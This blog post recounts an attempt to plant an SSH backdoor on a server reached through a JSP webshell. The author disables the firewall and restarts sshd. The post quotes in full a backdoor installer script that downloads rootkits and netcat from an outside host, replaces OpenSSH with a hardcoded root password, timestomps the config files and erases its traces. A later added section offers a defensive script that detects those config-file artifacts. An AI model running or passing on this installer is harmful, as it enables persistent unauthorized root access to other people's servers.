A Disaster Caused by an SSH Connection

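I did something really brain-dead today. A buddy tossed me a JSP shell, and I tried to help him leave an SSH backdoor. But I only looked at the IPs the shell reported: there were two, both public addresses. So I naturally assumed the host had its own dedicated public IP. However, the connection kept timing out. So I did the following two things:

1. service iptables stop

2. service sshd restart, or /etc/init.d/sshd restart

In other words, restart the service and turn off the firewall. But after doing that I still got a connection timeout. What to do? I thought of another approach: on the server side, in /etc/ssh/sshd_config, set ClientAliveInterval to 60 and ClientAliveCountMax to 3; on the client side, set ServerAliveInterval and ServerAliveCountMax to similar values.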

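Attached are the ways to connect to the SSH backdoor.

Reference links:

http://www.cnblogs.com/fnng/archive/2012/02/21/2362013.html  Connecting directly as a user with PuTTY

Or use Xshell -> ssh [email protected], fill in the username and enter the password

http://blog.163.com/lgh_2002/blog/static/44017526201011333227161/      SSH backdoor

Reference: a quick Linux backdoor shell script: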

++++++++++++++++++++++++++++++++++++++++++++++++++

#!/bin/bash   clear   echo -e “\033[1;035m \n”   echo ‘###############################’   echo ‘#—————————–#’   echo ‘#   WelCome to [url]www.90sec.org[/url]  #’   echo ‘#         hello I is helen    #’   echo ‘#           By:Mr,PriNce      #’   echo ‘#—————————–#’   echo ‘###############################’   if [ $(id -u) != 0 ];then   echo sorry,!root….   exit 1   fi   if [[ $1 -gt 4 ]] || [[ $1 == “” ]];then   echo “###############################”   echo “#—————————–#”   echo “#      1:sshbd backdoor       #”   echo “#      2:mafix backdoor       #”   echo “#      3:ddrk  backdoor       #”   echo “#         4:Netcat            #”   echo “#—————————–#”   echo “###############################”   fi   ssh1=”http://www.gome.com.hk/attachment/mc/sshbd.gz   ssh2=”http://www.gome.com.hk/attachment/mc/mafix.tar.gz   ssh3=”http://www.gome.com.hk/attachment/mc/ddrk-rootkit.tar   ssh4=”http://www.gome.com.hk/attachment/mc/netcat.tar.gz   dir=”/tmp/”   if [[ $1 -eq 1 ]];then   port=$(grep Port /etc/ssh/sshd_config)   echo “Current ssh $port”   read -p Enter:   wget $ssh1 -O $dir/sshbd.gz   cd $dir   tar zxvf sshbd.gz   mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old   mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old   cd openssh   ./configure –prefix=/usr –sysconfdir=/etc/ssh   make && make install   touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config   touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config   /etc/init.d/sshd restart   echo Current ssh $port   echo “sshbd backdoor install ok”   echo “Username:root Password:995430aaa”   rm -rf /tmp/openssh /tmp/sshbd*   exit   fi   if [[ $1 -eq 2 ]];then   wget $ssh2 -O $dir/mafix.tar.gz   cd $dir   tar zxvf mafix*   cd mafix*   read -p “Enter Backdoor Passwords:” ID   read -p “Enter Backdoor ssh Port:” back   ./root $ID $back   echo “mafix backdoor install ok”   echo “Current Port:” $back   rm -rf /tmp/mafix*   exit   fi   if [[ $1 -eq 3 ]];then   wget $ssh3 -O $dir/ddrk-rootkit.tar   cd $dir   tar xvf ddrk-rootkit*   cd 
ddrk   ./setup   echo “ddrk backdoor install ok”   echo “Username:root Passwords:123456”   echo “Port:43958”   rm -rf /tmp/ddrk*   exit   fi   if [[ $1 -eq 4 ]]; then   wget $ssh4 -O $dir/netcat.tar.gz   cd $dir   tar zxvf netcat.tar.gz   cd netcat*   ./configure   make && make install   echo “Netcat install ok”   rm -rf /tmp/netcat*   exit   fi

++++++++++++++++++++++++++++++++++++++++++++++++++
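An added example, not part of the original post or of the referenced script: option 1 of the script above moves /etc/ssh/sshd_config and /etc/ssh/ssh_config to .old and then copies the old timestamps onto the replacements with touch -r, which leaves artifacts a responder can check for. The function names, the root-prefix argument, the one-day ctime threshold and the sample tree are assumptions constructed for illustration, and GNU stat is assumed.

```bash
#!/bin/sh
# Added example: checks for the config-file artifacts left by the installer above.
# Assumes GNU stat (Linux). The argument is a root prefix, so the same check can
# be pointed at a mounted disk image; pass "" for the live filesystem.

# Prints one finding per line; returns 0 if anything was found, 1 if clean.
check_ssh_config_tamper() {
    local root="${1:-}" found=1 name cur old
    for name in sshd_config ssh_config; do
        cur="$root/etc/ssh/$name"
        old="$cur.old"
        [ -f "$old" ] || continue
        echo "FOUND $old (original config was moved aside)"
        found=0
        [ -f "$cur" ] || continue
        # touch -r copies the mtime of the .old file, so both match to the second.
        if [ "$(stat -c %Y "$cur")" = "$(stat -c %Y "$old")" ]; then
            echo "TIMESTOMP $cur has the same mtime as $old"
        fi
        # touch cannot set ctime; a ctime far later than mtime shows a later change.
        if [ $(( $(stat -c %Z "$cur") - $(stat -c %Y "$cur") )) -gt 86400 ]; then
            echo "CTIME $cur changed more than a day after its mtime"
        fi
    done
    return "$found"
}

# Constructed sample tree that mimics the state after the mv / touch -r steps.
build_sample_tree() {
    local t name
    t=$(mktemp -d) || return 1
    mkdir -p "$t/etc/ssh"
    for name in sshd_config ssh_config; do
        echo "Port 22" > "$t/etc/ssh/$name.old"
        touch -t 201201010000 "$t/etc/ssh/$name.old"   # pretend original is old
        echo "Port 22" > "$t/etc/ssh/$name"            # replacement written now
        touch -r "$t/etc/ssh/$name.old" "$t/etc/ssh/$name"
    done
    echo "$t"
}

# Demo run against the constructed tree.
demo=$(build_sample_tree) && check_ssh_config_tamper "$demo"; rm -rf "$demo"
```

On a live host, call check_ssh_config_tamper "" and follow any hit by verifying the installed OpenSSH files against the package database (for example rpm -V openssh-server on RPM-based systems).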

Thanks to the authors of the articles above.

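One last thing: I only found out it was an internal network after a friend woke me up to it and I ran ifconfig. I immediately felt I had been fiddling around for nothing.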